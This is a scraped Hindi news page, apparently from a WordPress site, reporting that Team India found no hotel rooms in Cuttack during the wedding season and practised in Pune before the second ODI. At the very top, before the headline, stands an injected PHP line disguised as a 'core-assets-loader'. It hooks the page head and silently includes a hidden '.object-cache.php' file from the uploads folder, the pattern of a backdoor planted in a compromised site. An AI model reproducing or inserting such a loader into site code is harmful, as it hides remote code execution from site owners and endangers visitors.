add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कटक के किसी होटल में टीम इंडिया को नहीं मिली जगह, शादियों के सीजन के चलते बुक हैं सभी होटल – SOCH INDIA
Menu

खेल
कटक के किसी होटल में टीम इंडिया को नहीं मिली जगह, शादियों के सीजन के चलते बुक हैं सभी होटल

nobanner

पुणे में मिली शानदार जीत के बाद टीम इंडिया अब सीरीज के अगले मैच के लिए कमर कस रही है. लेकिन तैयारियां अगले मैच के वेन्यू कटक में नहीं बल्कि पुणे में ही चल रही हैं.

होटल में जगह नहीं
विराट एंड कंपनी रविवार से अब तक पुणे में ही है. टीम को अगले वन-डे के लिए कटक पहुंचना था. लेकिन यहां टीम इंडिया के लिए किसी होटल में जगह ही नहीं है. शादी के सीजन के चलते कटक के सभी होटल पहले से ही बुक हैं. इसीके चलते प्लेयर्स को पुणे में ही प्रैक्टिस करनी पड़ रही है.

बदइंतजामी का आरोप
शेड्यूल में इस गड़बड़ी के चलते ओडिशा क्रिकेट एसोसिएशन को आलोचना झेलनी पड़ रही है. हालांकि एसोसिएशन के सेक्रेटरी आशीर्वाद बेहेरा ने सफाई दी है कि होटलों के बुक होने में उनका कोई जोर नहीं चल सकता था. उन्होंने उम्मीद जताई कि पुणे की तरह कटक का मैच भी हिट साबित होगा.

अब दोनों टीमें बुधवार को करीब 11.30 बजे कटक पहुंचेंगी और मैदान पर प्रैक्टिस सेशन के लिए करीब 4 बजे उतरेंगीं. तीन मैचों की सीराज का दूसरा वन-डे 19 जनवरी को होना है. टीम इंडिया फिलहाल सीरीज में 1-0 से आगे है.